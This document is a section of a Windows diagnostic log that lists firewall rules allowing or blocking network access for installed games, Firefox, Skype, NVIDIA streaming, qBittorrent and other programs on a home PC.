FirewallRules: [UDP Query User{EDC5A005-882F-439D-9609-CD03815D3841}D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe
FirewallRules: [{C1D9F0A3-FF2D-4386-B8A1-FC66E9C94E6C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cities_Skylines\Cities.exe
FirewallRules: [{269D0535-C251-4043-A842-DC60623DC634}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cities_Skylines\Cities.exe
FirewallRules: [{7A779327-2587-4326-9D15-E79A2F3F055F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Toribash\toribash.exe
FirewallRules: [{8320FB98-828B-4932-9A94-21B867456F90}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Toribash\toribash.exe
FirewallRules: [TCP Query User{9999040C-3648-45A1-8B0E-BDF1B3CA133F}D:\spel\star wars rebellion\rebexe.exe] => (Allow) D:\spel\star wars rebellion\rebexe.exe
FirewallRules: [UDP Query User{90D2846A-4BE4-4E4D-B9D1-2DDDA98866D9}D:\spel\star wars rebellion\rebexe.exe] => (Allow) D:\spel\star wars rebellion\rebexe.exe
FirewallRules: [TCP Query User{C4B6E894-1C14-4A73-AB91-825B611F1E25}D:\spel\diaspora\fs2_open_diaspora_r1.exe] => (Allow) D:\spel\diaspora\fs2_open_diaspora_r1.exe
FirewallRules: [UDP Query User{718E056C-2030-4D29-B4D8-281FF84A0063}D:\spel\diaspora\fs2_open_diaspora_r1.exe] => (Allow) D:\spel\diaspora\fs2_open_diaspora_r1.exe
FirewallRules: [TCP Query User{981E6CCF-911E-4BB6-9BDE-F9BE60F1FC49}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{9D625DCF-2803-443A-A39F-5BB8D22EE3D1}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{796658D6-38B6-4B01-BFF0-6C9766F89B8F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [{026DA7C2-00A3-4743-8248-993D97678418}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [TCP Query User{25DBFAF5-8C5E-4951-B0F2-E3444F0BA6E4}D:\spel\itg\program\in the groove 2.exe] => (Block) D:\spel\itg\program\in the groove 2.exe
FirewallRules: [UDP Query User{31DB31AD-B312-4DB8-BFED-C898D6B379EA}D:\spel\itg\program\in the groove 2.exe] => (Block) D:\spel\itg\program\in the groove 2.exe
FirewallRules: [{08FD0B95-B6FF-4AAE-AD20-9D98F039FF7B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\KM_TPR.exe
FirewallRules: [{F936ABFF-170D-46EF-A8A8-9D3DC696C88F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\KM_TPR.exe
FirewallRules: [{A19D7310-0EA2-40F7-ACC1-4F8DF0C9F7C6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\hd\Knights_and_Merchants_steam.exe
FirewallRules: [{BEB0FEE9-4558-4DEF-B073-31911291551A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\hd\Knights_and_Merchants_steam.exe
FirewallRules: [{9E75A985-D059-493E-84CE-E4DFAD5107DD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Torchlight II\ModLauncher.exe
FirewallRules: [{662A7F55-A717-4C86-B911-5CE3CFCF5E9F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Torchlight II\ModLauncher.exe
FirewallRules: [TCP Query User{D2AC309E-9958-42E6-B540-8EF8E661943B}D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [UDP Query User{AD605CAB-0CC7-411D-BACF-F5306499F43D}D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [{21308C21-15BC-4C73-AC44-2E6EED72A984}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Rochard\Rochard.exe
FirewallRules: [{E5D7FFC3-A7F6-4721-B0F8-4F35BF795C5F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Rochard\Rochard.exe
FirewallRules: [{6584EECA-A2DA-45B6-BF7E-81C0C250282A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{ECDAABD8-7E3F-40FB-A9CF-3C06B62FFB4C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{0919E39F-10B6-4737-A5C2-62953C825226}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{4D350746-BCCC-483E-B8E2-12CAA6A40386}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{8E40FC5B-4072-47CF-8B69-8006BC435CB1}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D08EFB35-473A-442B-A543-E08464001647}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Westerado\WesteradoDB.exe
FirewallRules: [{6B7260B7-CE43-44F8-8F83-96BA07DF356B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Westerado\WesteradoDB.exe
FirewallRules: [{E2B7627B-628F-4B51-A780-A4EB9ECACEB6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 3\trine3_launcher.exe
FirewallRules: [{8C9BD548-32BF-49BB-9202-1AA981952EA0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 3\trine3_launcher.exe
FirewallRules: [TCP Query User{FCC21E56-917A-448D-BC59-743E8D74F0C9}D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe
FirewallRules: [UDP Query User{0A5E8A79-55CB-47C8-BB0B-A12F2BC8F14C}D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe
FirewallRules: [TCP Query User{1B858E4D-0485-4D54-9183-AE75B20D8854}D:\spel\soldat\soldat.exe] => (Allow) D:\spel\soldat\soldat.exe
FirewallRules: [UDP Query User{8DD1BFC3-FE50-4431-AE63-BD0DB0817ADA}D:\spel\soldat\soldat.exe] => (Allow) D:\spel\soldat\soldat.exe
FirewallRules: [{64BFD6AB-8E20-4AE9-AE23-725CF5FC849A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{A531C7D2-3E9E-4204-9643-7BCBB06617C8}D:\spel\empyrion galactic survival\empyrion.exe] => (Allow) D:\spel\empyrion galactic survival\empyrion.exe
FirewallRules: [UDP Query User{3D1F26BE-E928-4D9F-BFD3-391F2A07FF09}D:\spel\empyrion galactic survival\empyrion.exe] => (Allow) D:\spel\empyrion galactic survival\empyrion.exe
FirewallRules: [{F6B6969E-325A-4E1A-A90C-BEA2B1A1DAAA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{76E1DBB9-EFBC-48E9-B5BA-FE535A8685E2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [TCP Query User{E3106317-FDAA-4CD0-A39E-A660AF03548C}D:\spel\redalert1_online\cncnet5.exe] => (Allow) D:\spel\redalert1_online\cncnet5.exe
FirewallRules: [UDP Query User{64F31AA8-3C83-4940-8B7A-BB9F03D708A2}D:\spel\redalert1_online\cncnet5.exe] => (Allow) D:\spel\redalert1_online\cncnet5.exe
FirewallRules: [{9A30AC21-A19E-473C-846E-824196B9E37A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40kWA.exe
FirewallRules: [{AC88119B-D54F-4D22-A23F-FC336B5B3FE3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40kWA.exe
FirewallRules: [{F5A1B688-4DE9-4BF7-89D2-D0FE92D6CE43}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Soulstorm\Soulstorm.exe
FirewallRules: [{AB75E7A9-563F-4519-B6BA-128A465905E5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Soulstorm\Soulstorm.exe
FirewallRules: [{D7EABB63-C0E8-418D-9792-0512F31AD004}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe
FirewallRules: [{1CB74876-21DE-407F-A0B2-FDE7F9F38EC9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe
FirewallRules: [{9B9FF0BC-4B86-405E-AB5E-6F3AA8EE9A66}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40k.exe
FirewallRules: [{3AFD306B-53D9-45A5-90DD-884175D2831F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40k.exe
FirewallRules: [TCP Query User{11E3CD2A-BFE1-4427-BF04-4A1C75D2F196}D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe] => (Allow) D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe
FirewallRules: [UDP Query User{A69725A6-B8F4-42F0-A9BB-3100B4AC7F21}D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe] => (Allow) D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe
FirewallRules: [TCP Query User{B4E0D202-9DD8-4535-BC9F-C83BC97D092D}D:\spel\redalert1_online\ra95-spawn.exe] => (Allow) D:\spel\redalert1_online\ra95-spawn.exe
FirewallRules: [UDP Query User{C88B50F5-D440-440A-8984-9524D85A6860}D:\spel\redalert1_online\ra95-spawn.exe] => (Allow) D:\spel\redalert1_online\ra95-spawn.exe
FirewallRules: [{1B83618F-D02D-42A8-9651-26E419CD1EFD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE.exe
FirewallRules: [{DCC47D05-2539-4E99-809D-58CD3ED4EBC8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE.exe
FirewallRules: [TCP Query User{7483B01C-FD81-471A-91F3-F27FD8DED9BD}D:\spel\steam library\steamapps\common\war thunder\aces.exe] => (Allow) D:\spel\steam library\steamapps\common\war thunder\aces.exe
FirewallRules: [UDP Query User{A1599774-927D-4906-A136-8EC9ACF6AFC7}D:\spel\steam library\steamapps\common\war thunder\aces.exe] => (Allow) D:\spel\steam library\steamapps\common\war thunder\aces.exe
FirewallRules: [{680C6942-7D40-4B01-9458-96ADE595E3AA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A9F7449B-0201-40D7-8E35-997E33F94A96}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8FA2650D-F133-4798-AA68-FA546B43510E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dr Langeskov, The Tiger, and The Terribly Cursed Emerald A Whirlwind Heist\DrLangeskov.exe
FirewallRules: [{F2EF4ACE-4392-41EA-9A3D-818A9B30333A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dr Langeskov, The Tiger, and The Terribly Cursed Emerald A Whirlwind Heist\DrLangeskov.exe
FirewallRules: [{6B5C548F-0E30-41E6-8D48-7A162673479B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Banished\Application-steam-x64.exe
FirewallRules: [{A5C0D7A5-9D50-4F01-8E97-27EC3563F5AB}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Banished\Application-steam-x64.exe
FirewallRules: [TCP Query User{2731C65B-2AA9-4B8E-B4DA-88ACF00DBE5B}D:\spel\helldivers\binaries\x64\helldivers.exe] => (Block) D:\spel\helldivers\binaries\x64\helldivers.exe
FirewallRules: [UDP Query User{2B62053B-324C-4636-91E9-DC9A0B7AAFF4}D:\spel\helldivers\binaries\x64\helldivers.exe] => (Block) D:\spel\helldivers\binaries\x64\helldivers.exe
FirewallRules: [TCP Query User{A66CA3B5-9472-41C7-8BD8-CAA2E73FAD07}D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [UDP Query User{A5C11343-440F-4262-BD52-9E2F69B4F9EF}D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [{9A330E71-4D27-42BC-9BC2-E5E8A8FF02CF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Screencheat\screencheat.exe
FirewallRules: [{2BC15E28-7E54-4572-A964-B96FC4DB517B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Screencheat\screencheat.exe
FirewallRules: [{568660FF-CAB1-45BA-B56E-43C90666721F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{9B05ECAE-6B44-4697-99A1-45B01D3DD64C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{76A57225-C3BD-4B04-9B9A-7A40234CAB14}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Keep Talking and Nobody Explodes\ktane.exe
FirewallRules: [{92128767-4267-40DA-B246-B3621A522DA3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Keep Talking and Nobody Explodes\ktane.exe
FirewallRules: [TCP Query User{F4A54B63-A8E2-4452-8180-850077D20496}D:\spel\heroes of might and magic 3 complete\heroes3.exe] => (Allow) D:\spel\heroes of might and magic 3 complete\heroes3.exe
FirewallRules: [UDP Query User{1EB19545-AA76-4B4D-8FA0-89BC76AF3D9D}D:\spel\heroes of might and magic 3 complete\heroes3.exe] => (Allow) D:\spel\heroes of might and magic 3 complete\heroes3.exe
FirewallRules: [TCP Query User{1DB3C684-26CE-478E-B0DD-F51D8611E804}D:\spel\factorio_0.12.20\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.12.20\bin\x64\factorio.exe
FirewallRules: [UDP Query User{D68A1112-A5DA-4D38-A500-B16AB85A58D8}D:\spel\factorio_0.12.20\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.12.20\bin\x64\factorio.exe
FirewallRules: [TCP Query User{7A51F80D-554A-454F-9E5A-F539A4E5C285}D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [UDP Query User{5D8931EF-4E7D-4C1D-9E38-AF85FB859C23}D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [{6853BAB0-1C4A-4E18-B5B6-EECEF7E1DF09}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{B567282B-F73F-4CEA-BE2F-2CBE938EAB18}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{492F1B4D-3B0C-4C98-B606-579059012453}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{56B6A10D-4D74-4722-BC01-33852584F8CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{B86F862D-C8D6-4C3E-B788-B5C6D93F3C1A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SteamVRPerformanceTest\bin\win64\vr.exe
FirewallRules: [{E649E9B4-0ABB-490F-9692-A3E981030DF2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SteamVRPerformanceTest\bin\win64\vr.exe
FirewallRules: [{FA2A2058-9CC5-4459-9D95-47A89CD852E7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [{ADCF1868-E26E-4EA4-85F6-A277BB4D94D6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [TCP Query User{DA1A4364-51A0-4A13-A617-34927AD2E0B4}D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe] => (Allow) D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe
FirewallRules: [UDP Query User{53DB7273-588B-4631-B918-C1DFCF0B5364}D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe] => (Allow) D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe
FirewallRules: [{0974B5FB-67A5-4311-93C8-3E31C934201B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Battlefleet Gothic Armada\BattleFleetGothic.exe
FirewallRules: [{23BBB59C-4E38-4F12-ACB5-AF621E695D47}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Battlefleet Gothic Armada\BattleFleetGothic.exe
FirewallRules: [TCP Query User{14EF59FD-4CBE-4477-BBF6-400D49178375}D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe
FirewallRules: [UDP Query User{6417FD98-D5AA-4DA6-9D9A-088A5C581014}D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe
FirewallRules: [TCP Query User{8623F9D7-F7B7-45A6-9E24-202C5CFE17C3}D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe] => (Allow) D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe
FirewallRules: [UDP Query User{D93CC1A3-71E8-4230-9363-9E43414DAB17}D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe] => (Allow) D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe
FirewallRules: [{E9AB914A-8CDB-4D70-B686-42574EAB783E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Environmental Station Alpha\Environmental Station Alpha.exe
FirewallRules: [{074E5D98-B4C1-47E6-BE65-7067C306E683}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Environmental Station Alpha\Environmental Station Alpha.exe
FirewallRules: [{EA0D1741-86B9-4111-A53B-D44A614EC2CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect Safe Mode.exe
FirewallRules: [{A81051AC-4649-42D9-B644-43E4ADEB4EC7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect Safe Mode.exe
FirewallRules: [{4ECF7C43-C7AC-41F1-AA43-78B4B7C00AA2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP_x64.exe
FirewallRules: [{2D1981B0-37C6-4A34-83FF-C25CDBFED6AB}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP_x64.exe
FirewallRules: [{750F14FD-12C1-459B-97AF-8045788F4A02}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
FirewallRules: [{BFCEA83A-D98F-4CE9-AF70-0BEB8A98845D}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
FirewallRules: [TCP Query User{26F32E06-8C99-4C4E-A88C-110F0BC5DEB9}D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll] => (Allow) D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll
FirewallRules: [UDP Query User{C97AC77B-B9AB-4ACF-BD03-C9C9FD6606B1}D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll] => (Allow) D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll
FirewallRules: [{638BA54D-2635-4759-BDFC-2D46474B6D37}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{E9B6E224-F758-479F-8277-959B1D50D0E5}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{1FE04074-9729-4611-A59B-6D1AD71FD0C4}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{3280B250-6F0E-46DD-8C7B-3AEE07BD6DA7}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{547FC444-5AC5-4171-8C2B-BC25DA6AD60F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{A70540E2-2F15-4B16-8EBF-9223237DB1D7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{B7FB3B81-9945-4456-AB4E-F3F462731DE7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE_executable.exe
FirewallRules: [{8D737F82-F9FE-4C2D-9234-9B6578374AE1}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE_executable.exe
FirewallRules: [{281F067D-4520-4004-80F6-32A0E6089BD1}] => (Allow) C:\Program Files\HP\HP ENVY 4520 series\Bin\DeviceSetup.exe
FirewallRules: [{070E3BD2-A6A8-4891-97D6-A4D2D79B90ED}] => (Allow) LPort=5357
FirewallRules: [{BC6962E0-A9E1-45E9-8CF2-F4BA0CE26FFF}] => (Allow) C:\Program Files\HP\HP ENVY 4520 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [TCP Query User{5561F357-1028-459A-B796-A4D123A8600D}D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe] => (Allow) D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe
FirewallRules: [UDP Query User{12859DF5-D5D5-4025-B2F8-E39E76CBB2AA}D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe] => (Allow) D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe
FirewallRules: [TCP Query User{7EE8CDD9-35C7-430D-95D8-451C632D7DCF}D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe] => (Allow) D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe
FirewallRules: [UDP Query User{F311FB22-AA27-4EC6-8AE7-1D9691835D1C}D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe] => (Allow) D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe
FirewallRules: [{33E129CF-48F9-46CD-BCC7-DD8BA14AF12D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Overcooked\Overcooked.exe
FirewallRules: [{16831414-067E-45D0-A4D5-E68B529DB6D5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Overcooked\Overcooked.exe
FirewallRules: [{50A06F50-7F3D-4BDC-9021-237A4C0B2C27}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Atlas Reactor\GlyphClient.exe
FirewallRules: [{1B14D338-DD94-4F52-AD5C-19A32CD5A7BC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Atlas Reactor\GlyphClient.exe
FirewallRules: [TCP Query User{4C44DD46-D7A9-4196-8296-EEC3056A05BA}D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe] => (Block) D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe
FirewallRules: [UDP Query User{0E56461D-D37A-4C4F-A638-64AA8F253EF7}D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe] => (Block) D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe
FirewallRules: [TCP Query User{7B48B31B-0302-4CA8-9E87-F07AB35F2D86}D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe
FirewallRules: [UDP Query User{0CAAB1E6-B8C4-4C54-8EED-E55C7FFDD98D}D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe
FirewallRules: [{4EE9956F-18E1-400E-BF78-B16CA5740983}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Dedicated Server\EmpyrionLauncher.exe
FirewallRules: [{1F4F4B1F-6EB7-49F2-BEB5-C5D20017F534}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Dedicated Server\EmpyrionLauncher.exe
FirewallRules: [{4E13484E-599F-4A55-8783-90ECC346BE91}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Galactic Survival\EmpyrionLauncher.exe
FirewallRules: [{EB02CC0B-C01C-4CF1-B865-43DD5B64DA66}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Galactic Survival\EmpyrionLauncher.exe
FirewallRules: [{56A01BA7-991A-4E71-996A-9DB735036A2A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot\lancealot.exe
FirewallRules: [{164D6B17-3E23-4D7A-8EC8-9B92D2908A27}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot\lancealot.exe
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [TCP Query User{EAEAB11E-0749-492A-83F8-9E619C0825FB}D:\spel\company of heroes\bugreport\bugreport.exe] => (Block) D:\spel\company of heroes\bugreport\bugreport.exe
FirewallRules: [UDP Query User{3A908214-3ACB-45F3-87BB-034C922C2A9D}D:\spel\company of heroes\bugreport\bugreport.exe] => (Block) D:\spel\company of heroes\bugreport\bugreport.exe
FirewallRules: [{BC279C92-F389-439A-AA3C-F8FC24E7E3E0}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{54C5FE03-560A-42F0-A953-CC57545F85F2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{09DF48B2-2698-410B-B67C-DB382410B87B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [{89F025E4-A12F-4D64-8F4E-65A58D8FF1E4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [TCP Query User{5A0AE274-1115-456E-8097-7259AE6A531D}D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe
FirewallRules: [UDP Query User{15BE3688-275A-40F9-8987-65CFDE79CC41}D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe
FirewallRules: [{6A1EE22B-EFB5-403F-96B8-92BF6419D6D3}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{4F8E8B43-EDDE-423A-AFB4-558A6797AA1B}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{587354FE-5AA4-40B2-8BE8-3F068F603006}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Duck Game\DuckGame.exe
FirewallRules: [{2F20DB6C-39DB-42F5-B0EA-93724F169BF7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Duck Game\DuckGame.exe
FirewallRules: [{CEE996FE-EC7E-4B5B-83A4-8D572D4710AC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\TowerFall\TowerFall.exe
FirewallRules: [{66553191-FBFE-4728-8CDE-F8A61645C7E4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\TowerFall\TowerFall.exe
FirewallRules: [{BEC5AC23-37B2-40FD-8357-3AEC0079BE6C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Planet Coaster\PlanetCoaster.exe
FirewallRules: [{D8EFC4A0-1905-4C93-9620-035D8AA25691}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Planet Coaster\PlanetCoaster.exe
FirewallRules: [{ACD083CA-B56C-4A63-AC29-54CF6A0CD632}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Samorost 3\Samorost3.exe
FirewallRules: [{C888B48B-D53E-439A-AC80-145CA44D4737}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Samorost 3\Samorost3.exe
FirewallRules: [TCP Query User{E3430B03-1B85-4352-B782-0FA31716971E}D:\spel\uplay library\forhonor\forhonor.exe] => (Allow) D:\spel\uplay library\forhonor\forhonor.exe
